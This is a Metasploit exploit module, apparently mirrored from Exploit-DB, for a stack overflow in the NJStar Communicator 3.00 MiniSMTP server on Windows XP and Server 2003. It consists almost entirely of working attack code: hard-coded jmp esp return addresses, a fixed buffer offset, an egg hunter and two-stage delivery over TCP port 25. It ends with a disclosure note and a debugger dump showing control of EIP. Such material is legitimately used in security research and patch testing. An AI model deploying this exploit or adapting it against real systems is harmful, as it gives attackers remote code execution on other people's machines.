NJStar Communicator 3.00 – MiniSMTP Server Remote (Metasploit)

  • 作者: Dillon Beresford
    日期: 2011-10-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18057/
  • ##
    # Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
    # Date: 10/31/2011
    # Author: Dillon Beresford
    # Twitter: https://twitter.com/#!/D1N
    # Software Link: http://www.njstar.com/download/njcom.exe
    # Version: 3.00 and prior
    # Build: 11818 and prior 
    # Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
    # CVE : NONE
    # Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran, 
    # manils, d0tslash, mublix, halsten, and everyone at AHA!
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    # 
    ##
    
    require 'msf/core'
    
    ##
    # Metasploit exploit module for the stack overflow in the NJStar
    # Communicator 3.00 MiniSMTP server (see 'Description' below).
    #
    # #exploit delivers in two stages over two separate TCP connections: the
    # first carries the egg (the encoded payload, tagged for the egg hunter),
    # the second carries the overflow buffer that contains the egg hunter.
    ##
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = NormalRanking

    	# Remote::Tcp supplies connect / sock / disconnect used in #exploit;
    	# Egghunter supplies generate_egghunter.
    	include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Egghunter

    	# Module metadata. Every target shares the same 'Offset' (247): in
    	# #exploit that many bytes of random filler are emitted before the packed
    	# 'Ret' value, which the trailing comment on each target annotates as a
    	# jmp esp in a per-OS system DLL. The only registered option is RPORT
    	# (default 25).
    	#
    	# NOTE(review): the OSVDB and CVE reference entries are blank; the file
    	# header states "CVE : NONE".
    	#
    	# @param info [Hash] metadata merged by update_info
    	def initialize(info = {})
    		super(update_info(info,
    			'Name'		=> 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
    			'Description'	=> %q{
    					This module exploits a stack overflow vulnerability in NJStar Communicator 
    					Version 3.00 MiniSMTP server.
    			},
    			'License'		=> MSF_LICENSE,
    			'Author'		=>
    				[
    					'Dillon Beresford',	# Original discovery and MSF Module.
    					'Corelan Team',	# tx for mona.py, all the tuts, and for being awesome. :)
    				],
    			'Version'		=> '$Revision:$',
    			'References'	=>
    				[
    					[ 'OSVDB', '' ],
    					[ 'CVE', '' ],
    					[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
    					[ 'URL', 'http://www.youtube.com/watch?v=KvkKX035484'],
    				],
    			'DefaultOptions' =>
    				{
    					'EXITFUNC' => 'thread',
    				},
    			'Platform'	=> 'win',
    			'Payload'	=>
    				{
    'BadChars' => "\x00",
    'StackAdjustment' => -1500,
    				},

    			'Targets'		=>
    				[
    					[ 'Windows XP SP3',
    					{
    'Ret' 	=>	0x7c874413,
    'Offset'	=>	247,
    					} # jmp esp kernel32.dll
    			], 
    			[ 'Windows XP SP2',
    			{
    			'Ret' => 0x77558952,
    			'Offset'=> 247,
    			} # jmp esp ntdll.dll
    			],
    			[ 'Windows XP SP1',
    			{
    			'Ret' => 0x77d718fc,
    			'Offset'=> 247,
    			} # jmp esp user32.dll
    			],
    			[ 'Windows Server 2003 SP0',
    					{
    'Ret' 	=>	0x71c033a0,
    'Offset'	=>	247,
    					} # jmp esp ntdll.dll
    			],
    				], # Feel free to add more targets.
    			'Privileged'	=> false,
    			'DisclosureDate'	=> 'OCT 31 2011',
    			'DefaultTarget'	=> 0))

    		# RPORT is the only module-specific option; SMTP default is 25.
    		register_options([Opt::RPORT(25)], self.class)

    	end

    	# Builds and sends the two-stage delivery: the egg on one connection,
    	# then the overflow buffer carrying the egg hunter on a second one,
    	# followed by the payload handler.
    	#
    	# @return [void]
    	def exploit

    # Egg hunter options: checksum the egg and tag it with "w00t".
    eggoptions =
    {
    :checksum => true, 
    :eggtag => "w00t"
    }

    # NOTE(review): single-quoted, so this is the four-character literal
    # backslash-x-0-0 rather than a NUL byte, whereas the payload 'BadChars'
    # entry in initialize uses a double-quoted "\x00". Confirm which form
    # generate_egghunter expects.
    badchars = '\x00' 
    hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

    # All four branches build the same buffer: target['Offset'] bytes of
    # random filler, the 'Ret' packed little-endian ('V'), the hunter, then
    # 4 NOPs. `buffer` is only assigned inside a branch, so a target name that
    # matched none of these patterns would leave it nil and the
    # print_status call below would raise NoMethodError.
    if target.name =~ /Windows XP SP3/

    buffer =rand_text(target['Offset'])
    buffer << [target.ret].pack('V') 
    buffer << hunter
    buffer << make_nops(4)

    elsif target.name =~ /Windows XP SP2/

    buffer =rand_text(target['Offset'])	
    buffer << [target.ret].pack('V') 
    buffer << hunter
    buffer << make_nops(4)

    elsif target.name =~ /Windows XP SP1/

    buffer = rand_text(target['Offset'])
    buffer << [target.ret].pack('V') 
    buffer << hunter
    buffer << make_nops(4)

    elsif target.name =~ /Windows Server 2003 SP0/

    buffer = rand_text(target['Offset'])
    buffer << [target.ret].pack('V') 
    buffer << hunter
    buffer << make_nops(4)

    end

    # Just some debugging output so we can see lengths and byte size of each of our buffer.
    # (`%` binds tighter than `+`, so each line is "<label> % length" followed by the hex dump.)
    print_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
    print_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
    print_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

    print_status("Trying target #{target.name}...")

    # har har har you get trick no treat...
    # we dont have very much space so we
    # send our egg in a seperate connection

    # First connection: the egg alone. NOTE(review): this socket is not
    # explicitly closed before the second connect below; the single
    # disconnect at the end presumably closes only the most recent `sock`
    # — verify against the Tcp mixin.
    connect

    print_status("Sending the egg...")
    sock.put(egg)

    # I think you betta call, ghostbusters...
    # now we send our evil buffer along with the
    # egg hunter, we are doing multiple connections
    # to solve the issue with limited stack space.
    # thanks to bannedit for advice on threads and
    # making multiple connections to get around
    # stack space constraints. :)

    # Second connection: the overflow buffer that carries the egg hunter.
    connect

    print_status("Sending our buffer containing the egg hunter...")
    sock.put(buffer)

    		# Start the payload handler, then close the current connection.
    		handler
    		disconnect
    	end
    end
    
    ##
    # No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
    # on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability 
    # is remotely exploitable and needed more verification. I sent a proof of concept exploit 
    # in python with remote code execution. So, here is the proof that the bug is, in fact, 
    # remotely exploitable. WIN!
    ##
    
    ##
    # eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
    # edi=008a3d80
    # eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
    # efl=00010206
    # 42424242 ?????
    # 0:003> !exchain
    # image00400000+bbc4 (0040bbc4)
    # 00ccff00: 41414141
    # Invalid exception stack at 41414141
    # 0:003> d esp
    # 00ccff70  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
    # 00ccff80  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
    # 00ccff90  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
    # 00ccffa0  44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00  DDDD......@. #A.
    # 00ccffb0  00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00  ........)..|.=..
    # 00ccffc0  00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f  .........=......
    # 00ccffd0  00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff  ................
    # 00ccffe0  d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00  ...|0..|........
    ##